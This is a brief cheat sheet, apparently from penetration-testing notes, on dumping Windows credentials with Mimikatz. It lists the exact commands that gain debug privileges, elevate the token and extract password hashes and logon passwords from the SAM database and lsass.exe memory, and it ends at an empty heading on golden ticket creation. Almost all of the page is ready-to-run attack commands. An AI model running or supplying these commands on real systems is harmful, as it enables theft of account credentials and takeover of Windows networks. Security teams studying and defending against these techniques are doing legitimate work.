Credentials on Windows
Mimikatz
Hash dumping
#Checks if mimikatz is running with admin rights, elevates those (code 20 ; OK)
privilege::debug
token::elevate
#Dumps from SAM (Security Account Managers)
lsadump::lsa /patch
lsadump::SAM
#Extracts from the lsass.exe process (memory)
sekurlsa::logonpasswordsGolden ticket creation
Last updated